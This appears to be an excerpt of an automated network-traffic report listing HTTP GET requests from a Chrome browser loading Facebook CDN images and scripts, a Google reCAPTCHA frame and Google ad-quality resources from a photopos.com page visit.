                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/327202393_725872348923464_3606598550657805898_n.jpg?stp=dst-jpg_p130x130_tt6&_nc_cat=106&ccb=1-7&_nc_sid=4cb600&_nc_ohc=E5V1x15ZDQwQ7kNvgES85Gs&_nc_oc=Adg_AKri_S9JBuxKckg4ueMhMJAbAMsLREAutTNJK0ekbaFBqC11JBD-angL8idCzRA&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYA6NnjmCR2IgEOFKyT7llWIuCAMpjZMawOlZHEIu8wqMA&oe=67C133C8 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/472881988_9010286282396473_7354450008631580342_n.jpg?stp=dst-jpg_p118x90_tt6&_nc_cat=102&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=DEtu8IWHK3IQ7kNvgFl0sPj&_nc_oc=AdjspQCwc2Oz5gFg49Mpux1Wtvo_K4BwDqXV-RJcBYfkGzihnRpkRBCBmIhlt3GVD_E&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDkpvg9U_pJb-XrgLdfrjotFekmvVID3sKHQMQPsOi73Q&oe=67C11961 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /recaptcha/api2/aframe HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /sodar/sodar2/232/runner.html HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /getconfig/sodar?sv=200&tid=gda&tv=r20250218&st=env HTTP/1.1Host: ep1.adtrafficquality.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yB/r/0bWEtGbW7yi.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yC/r/-TQjj4cEPtX.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /sodar/sodar2.js HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yF/r/p55HfXW__mM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/327202393_725872348923464_3606598550657805898_n.jpg?stp=dst-jpg_p130x130_tt6&_nc_cat=106&ccb=1-7&_nc_sid=4cb600&_nc_ohc=E5V1x15ZDQwQ7kNvgES85Gs&_nc_oc=Adg_AKri_S9JBuxKckg4ueMhMJAbAMsLREAutTNJK0ekbaFBqC11JBD-angL8idCzRA&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYA6NnjmCR2IgEOFKyT7llWIuCAMpjZMawOlZHEIu8wqMA&oe=67C133C8 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yo/r/xT2o9sdmsY8.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/472881988_9010286282396473_7354450008631580342_n.jpg?stp=dst-jpg_p118x90_tt6&_nc_cat=102&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=DEtu8IWHK3IQ7kNvgFl0sPj&_nc_oc=AdjspQCwc2Oz5gFg49Mpux1Wtvo_K4BwDqXV-RJcBYfkGzihnRpkRBCBmIhlt3GVD_E&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDkpvg9U_pJb-XrgLdfrjotFekmvVID3sKHQMQPsOi73Q&oe=67C11961 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yB/r/BHyxADbJQ4K.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yZ/r/eyDfcHead4k.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yI/r/4jGkrolTMU7.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4iEpO4/yl/l/en_US/cTs2q6xvXkM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yG/r/KlfOnuX2IHm.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yB/r/0bWEtGbW7yi.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yF/r/p55HfXW__mM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yC/r/-TQjj4cEPtX.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-1/325666997_1585103711933804_239555497008707502_n.png?stp=cp0_dst-png_s50x50&_nc_cat=103&ccb=1-7&_nc_sid=fe756c&_nc_ohc=AsIchfz5busQ7kNvgHgp8ZW&_nc_oc=AdgVdDdktMQdaWkhVa4Ss5luDveChM93ScZwPv9yLFWtDnTkYkghxWMad3NUfB8QYJk&_nc_zt=24&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYCMsN2qFPW5D3XpRflFxLH8eYoRVLf1MYdh1nK4t89ogA&oe=67C10037 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.30808-6/472812542_9010286035729831_389804098435164931_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=101&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=wdxhRLNQXp0Q7kNvgFxREkC&_nc_oc=AdgIky26HhfEYMXW1VpJ41H0qO9zEz1Xbz0YxcYwmL0KG6FhrqK9tFZhyzIyk7FXQtI&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYBDjtwY9PIGAvCuIwUQvWU96xAH12w2uScduy2fFrQO8g&oe=67C11E73 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/125374536_3505762139515609_345486544270513144_n.jpg?stp=dst-jpg_p118x90_tt6&_nc_cat=110&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=z739BLmmcA4Q7kNvgEOWtTs&_nc_oc=AdjLpKzxVyp7jZvQHoQmPgf8oTb7o7gAASO8BUoFVVTYZeutOaL4DTE4uUdPFpfYYNQ&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYCulKjxuzZ63rFVKR4VPqqF-J5SbDmqlnsQLfz6U5PaMw&oe=67E2C244 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/125369428_3505762246182265_5743839440214211017_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=101&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=9AjSTXarM-kQ7kNvgGVIC-D&_nc_oc=Adhnw0dk2IYfcmwgiW-JPHHkapbhjv7Gmt4rwA2w0P__GbWr7H7fakQCtD9gIY319fg&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDfr9Q-xxWT989X6hsw_b69hjOfyAfUPrkVOFW-K2vEYA&oe=67E29E74 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t1.6435-9/101966363_3041025909322570_750950911169265664_n.jpg?stp=dst-jpg_s168x128_tt6&_nc_cat=106&ccb=1-7&_nc_sid=e5c1b6&_nc_ohc=MAXqGaKFQTQQ7kNvgF7FXfa&_nc_oc=Adi-IVyrb1EixvFUTyCVSMJvY7_SKawU9pJvD8Ld0vmKuTOkLmeQ1MjgO1KldD-_YiU&_nc_zt=23&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYDbBXZA0UAFixfLcZouHK7vA0ZUVbIj54LDnELyGLV7XA&oe=67E2BFA6 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yw/r/UXtr_j2Fwe-.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v5/yJ/l/0,cross/_90tcAUTWFg.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yG/r/mhLQdv6ozV0.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v5/y6/l/0,cross/6mRSUtlD7HY.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.10873-6/36920094_248623919067915_1424366723364028416_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=427b5c&_nc_ohc=bu5-VaXi4fwQ7kNvgGJcjlI&_nc_oc=AdiD40mVpUZmk0DWvMyx7R5-S3CWzQZW7wqeVx7XV3ZWO0zBhF2EQqM118EVRoySOjw&_nc_zt=14&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYD2gAZGZ7M17JU34nWKQz-5jC-xyjZVfxFrjrXZ9kDfrg&oe=67C12E14 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4iEBX4/ya/l/en_US/Yi1EwSfun-P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/y9/r/ie38mp0O07P.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yB/r/BHyxADbJQ4K.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yo/r/xT2o9sdmsY8.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v4/yZ/r/eyDfcHead4k.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /generate_204?ExdB1A HTTP/1.1Host: ep2.adtrafficquality.googleConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /v/t39.10873-6/37014161_191762008158040_6559530399574261760_n.jpg?_nc_cat=1&ccb=1-7&_nc_sid=427b5c&_nc_ohc=Hf0Zl4qeu3AQ7kNvgEPDOEn&_nc_oc=AdhAUOIRjaHU9zGCLph-Hh6HQsfrwVTulHSAqOjuxeXm2ST5jhNSASKwS5KElNxxYiQ&_nc_zt=14&_nc_ht=scontent.xx&edm=AItmks8EAAAA&_nc_gid=AS0Pd2d813eLEBse7jbifTv&oh=00_AYBqOi-Bl8FaWGA-9dG1PrBIevi_LLzgJVjDts1e6cR4SQ&oe=67C11C79 HTTP/1.1Host: scontent.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
